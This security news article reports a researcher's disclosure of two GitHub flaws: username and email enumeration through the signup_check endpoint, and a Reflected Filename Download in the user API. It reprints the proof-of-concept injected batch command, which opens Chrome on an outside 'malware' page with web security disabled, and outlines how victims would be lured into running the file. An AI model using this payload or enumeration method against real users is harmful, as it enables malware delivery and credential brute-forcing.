A researcher discovered two security issues in the GITHUB platform

A security researcher discovered a couple of security issues on GitHub platform explaining how it is possible to exploit them in real attack scenarios.

The researcher David Sopas (@dsopas) from Websegura discovered a couple of security issues in the coding website GitHub that were ranked by the company as minor, but that could expose users to cyber attacks.

The first flaw discovered by Sopas was exploitable to enumerate Username and Email of GitHub users. The expert simply created an account and verified through Request URL that signup_check retrieves a “Status code” 403 Forbidden if the username exists or is invalid, meanwhile if it doesn’t exist it retrieves a “Status code” 200 OK. 

The behavior is the same for email verification as explained by Sopas.

“When I created an account If I send an existing or invalid username it shows”

Remote Address:192.30.252.130:443
Request URL:https://github.com/signup_check/username
Request Method:POST
Status Code:403 Forbidden

But if I send a non-existing username it shows:

Remote Address:192.30.252.130:443
Request URL:https://github.com/signup_check/username
Request Method:POST
Status Code:200 OK

It also works for emails the same way.

Remote Address:192.30.252.129:443
Request URL:https://github.com/signup_check/email
Request Method:POST
Status Code:403 Forbidden

Remote Address:192.30.252.129:443
Request URL:https://github.com/signup_check/email
Request Method:POST
Status Code:200 OK

It is clear that the issue could be exploited to automatize the enumeration process as explained Sopas.

“What can be done with this? Using Burp proxy tool a malicious user could automatize this task and check for valid usernames and emails. Then even try to brute force them using a wordlist.” explained Sopas in a blog post.

The second flaw is a Reflected Filename Download affecting the GitHub API. The expert used a persistent reflected field in the user account to exploit the flaw. The field “Name” is one of the fields on the user account that could be used, the attacker just needs to reflect it on the user’s JSON file.

By inserting a batch command in the field, the attacker can make some operations as demonstrated in the proof-of-concept by Sopas that succeded into opening a Chrome new window with a “malicious page” disabling most protections from the browser.

David Sopas”||start chrome websegura.net/malware.htm –disable-web-security –disable-popup-blocking||

The structure of the JSON file associated with the user’s account used by Sopas (https://api.github.com/users/dsopas) is– you’ll see:

{
(…)
“name”: “David Sopas\”||start chrome websegura.net/malware.htm –disable-web-security –disable-popup-blocking||”,
“company”: “”,
“blog”: “”,
“location”: “”,
“email”: “”,
“hireable”: false,
“bio”: null,
“public_repos”: 0,
“public_gists”: 0,
“followers”: 0,
“following”: 0,
(…)
}

The reflected part doesn’t present problems so the experts need use a filename avoiding restrictions on the GitHub path to exploit the flaws. In his PoC, Sopas uses HTML5 DOWNLOAD attribute to complete the attack that works for Chrome, Opera, Android Browser, Chrome for Android, Firefox [forcing the user to “Save Link As”].

At this point to complete the exploit the attacker need to trick a victim into click on the download link to get a file supposed to be on api.github.com which is a [a trusted domain.

Below the Video PoC this second flaw:

The attack was similar to the one reported by Sopas a few days ago in a post describing how to exploit a Reflected Filename Download against the Instagram platform in order to serve malicious links.

Also in this case the possible attack scenarios are:

1. Malicious user posts a new message on the GitHub [social network, forums, etc…]
2. Victims clicks on the link and checks that the file is store on GitHub servers and runs it
3. Victim has been infected with malware

Pierluigi Paganini

(Security Affairs –  GITHUB,   hacking)